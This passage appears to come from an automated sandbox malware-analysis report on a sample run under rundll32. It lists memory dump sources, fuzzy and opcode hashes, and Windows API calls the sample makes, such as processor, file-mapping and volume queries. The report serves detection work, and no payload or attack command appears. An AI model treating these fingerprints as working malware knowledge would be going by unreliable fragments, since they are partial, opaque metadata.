                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                    • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNEL32 ref: 0040D60A
                    • GetProcAddress.KERNEL32 ref: 0040D619
                    • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleInformationLogicalModuleProcProcessor
                    • String ID: GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 4292003513-812649623
                    • Opcode ID: a3b137bb38b964c4aad35ffd3a75304e133271fe787b705fcb47eb8fb69c2827
                    • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                    • Opcode Fuzzy Hash: a3b137bb38b964c4aad35ffd3a75304e133271fe787b705fcb47eb8fb69c2827
                    • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                    • String ID:
                    • API String ID: 3559396350-0
                    • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                    • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 1269242970-0
                    • Opcode ID: 9536fcacba14ebfa071a3de4df2a683843a657af3e0c86f99e02428926cb4329
                    • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                    • Opcode Fuzzy Hash: 9536fcacba14ebfa071a3de4df2a683843a657af3e0c86f99e02428926cb4329
                    • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 8ab163486b0a053c2a7d456d2aea00ace8804d18e54ae64613c8b82fc606183d
                    • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                    • Opcode Fuzzy Hash: 8ab163486b0a053c2a7d456d2aea00ace8804d18e54ae64613c8b82fc606183d
                    • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetThreadUILanguage.KERNEL32 ref: 004145B9
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$LanguagesPreferred$Language
                    • String ID:
                    • API String ID: 2255706666-0
                    • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                    • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • GetVolumeInformationW.KERNEL32 ref: 0043657C
                    • GetDriveTypeW.KERNEL32 ref: 004365D7
                      • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
